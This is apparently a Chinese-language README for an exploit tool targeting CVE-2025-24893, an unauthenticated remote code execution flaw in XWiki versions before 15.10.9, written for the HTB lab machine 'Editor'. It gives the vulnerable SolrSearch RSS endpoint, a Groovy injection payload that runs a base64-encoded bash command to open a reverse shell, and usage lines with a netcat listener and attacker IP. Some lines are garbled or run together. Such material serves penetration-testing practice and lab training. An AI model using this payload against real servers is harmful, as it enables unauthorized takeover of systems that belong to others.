针对受 CVE-2025-24893 影响的 XWiki 版本的未认证远程代码执行(RCE)漏洞利用工具。
15.10.9 之前的 XWiki 版本可通过 SolrSearch RSS 订阅源处理器中的 Groovy 脚本注入,受到未认证 RCE 漏洞的影响。该漏洞之所以存在,是因为 XWiki 未能正确清理 text 参数中的用户输入,从而允许攻击者突破 RSS 上下文并注入任意 Groovy 代码。
CVE 编号: CVE-2025-24893
CVSS 评分: 9.8(严重)
受影响版本: XWiki < 15.10.9
requests 库)pip3 install requests
python3 exploit.py <target_url> <attacker_ip> <listener_port>
示例:
# 在攻击机上启动监听器
nc -lvnp 9001
# 运行漏洞利用脚本
python3 exploit.py http://10.10.11.80:8080 10.10.14.5 9001
}}}}}}{{{{groovy}}}})将其包装在 Groovy 代码中/xwiki/bin/get/Main/SolrSearch?media=rss&text=<payload> 发送 GET 请求该漏洞利用工具针对以下端点:
/xwiki/bin/get/Main/SolrSearch?media=rss&text=
该漏洞允许突破 RSS 订阅源上下文:
}}}}}}{{{{async async=false}}}}{{{{groovy}}}}
"bash -c {echo,<base64_payload>}|{base64,-d}|{bash,-i}".execute()
{{{{/groovy}}}}{{{{/async}}}}
此工具仅供教育和授权渗透测试使用。作者不对因使用本程序造成的任何滥用或损害负责。请仅对您拥有或已获得明确测试许可的系统使用此漏洞利用脚本。
MIT 许可证 - 详情请参阅 LICENSE 文件
为 HTB 靶机 "Editor" 而创建
注意: 在测试任何系统之前,请始终确保您已获得适当的授权。